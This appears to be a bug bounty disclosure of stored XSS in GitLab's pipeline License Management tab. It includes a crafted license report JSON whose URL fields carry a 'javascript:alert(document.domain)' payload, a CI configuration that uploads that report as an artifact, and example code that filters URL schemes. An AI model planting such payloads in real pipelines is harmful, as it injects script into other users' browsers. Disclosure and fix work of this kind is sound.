Stored XSS on Pipeline License Tab
Link: https://hackerone.com/reports/414341
By: @ngalog
Details: Summary: License Management accepts an external URL for each license, and that URL accepts any scheme, including javascript:. This allows an attacker to perform XSS against users browsing a pipeline's License Management tab.
Quick PoC
Visit https://gitlab.com/golduserngalog/bugbountyref/pipelines/31196139/licenses, click MIT, then click the URL; an alert box will show up.
Steps To Reproduce:
Fork https://gitlab.com/golduserngalog/bugbountyref/ and trigger CI/CD. Then visit the pipeline, open the License tab, select the license and click its URL.
Why
Because when the report file is uploaded as an artifact, the URL it contains is rendered as a link without the scheme being filtered or escaped properly.
file name: gl-license-management-report.json
{
  "licenses": [
    {
      "count": 1,
      "name": "GNU Affero General Public License v3"
    },
    {
      "count": 1,
      "name": "MIT"
    }
  ],
  "dependencies": [
    {
      "license": {
        "name": "GNU Affero General Public License v3",
        "url": "javascript:alert(document.domain)"
      },
      "dependency": {
        "name": "freeze",
        "url": "https://github.com/adfinis-sygroup/freeze",
        "description": "Freeze - dump / hash / sort / compare / diff anything",
        "pathes": [
          "."
        ]
      }
    },
    {
      "license": {
        "name": "MIT",
        "url": "javascript:alert(document.domain)"
      },
      "dependency": {
        "name": "six",
        "url": "http://pypi.python.org/pypi/six/",
        "description": "Python 2 and 3 compatibility utilities",
        "pathes": [
          "."
        ]
      }
    }
  ]
}
Also, this file alone won't trigger the license tab; you will need to upload it as an artifact as well.
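The fix the report calls for is to validate the scheme of every `url` field in the report before it becomes an href. The following is an added example (not GitLab's code) of such a check, run over a constructed report shaped like the one above; `safeHref` and `sanitizeLicenseReport` are hypothetical names.

```javascript
// Added example, not GitLab's code: validate the `url` fields of a
// gl-license-management-report.json before the UI renders them as links.
// Only http(s) URLs are kept; anything else (javascript:, data:, malformed
// or relative values) is replaced with null so no script-capable href is emitted.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the normalised URL string if it is safe to use as an href, else null.
function safeHref(value) {
  if (typeof value !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(value.trim()); // absolute URLs only; relative ones throw
  } catch (e) {
    return null;
  }
  // URL() lowercases the scheme, so "JavaScript:" and "javascript:" compare equally.
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

// Walks a parsed report in place, nulling unsafe license and dependency URLs.
// Returns the rejected values so they can be logged when the artifact is ingested.
function sanitizeLicenseReport(report) {
  const rejected = [];
  for (const dep of report.dependencies || []) {
    for (const entity of [dep.license, dep.dependency]) {
      if (!entity || entity.url === undefined) continue;
      const safe = safeHref(entity.url);
      if (safe === null) rejected.push(entity.url);
      entity.url = safe;
    }
  }
  return rejected;
}

// Constructed sample mirroring the report shape from the write-up.
const SAMPLE_REPORT = {
  licenses: [{ count: 1, name: 'MIT' }],
  dependencies: [{
    license: { name: 'MIT', url: 'javascript:alert(document.domain)' },
    dependency: { name: 'six', url: 'http://pypi.python.org/pypi/six/', pathes: ['.'] },
  }],
};
```

Logging the rejected values (rather than silently dropping them) is what lets a defender spot a pipeline whose report artifact was crafted to carry a javascript: link.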
PoC .gitlab-ci.yml
image: "alpine"

a:
  script:
    - echo "scddript"
    - echo "a"
  cache:
    key: "yoyaoyoasdf"
    policy: push #or push if you like to poison
    paths:
      - .

license_management:
  image: docker:stable
  stage: test
  variables:
    DOCKER_DRIVER: overlay2
  allow_failure: true
  services:
    - docker:stable-dind
  script:
    - export LICENSE_MANAGEMENT_VERSION=$(echo "$CI_SERVER_VERSION" | sed 's/^\([0-9]*\)\.\([0-9]*\).*/\1-\2-stable/')
    - docker run
        --volume "$PWD:/code"
        "registry.gitlab.com/gitlab-org/security-products/license-management:$LICENSE_MANAGEMENT_VERSION" analyze /code
    - cat gl-license-management-report.json
  artifacts:
    paths: [gl-license-management-report.json]
Impact
Stored XSS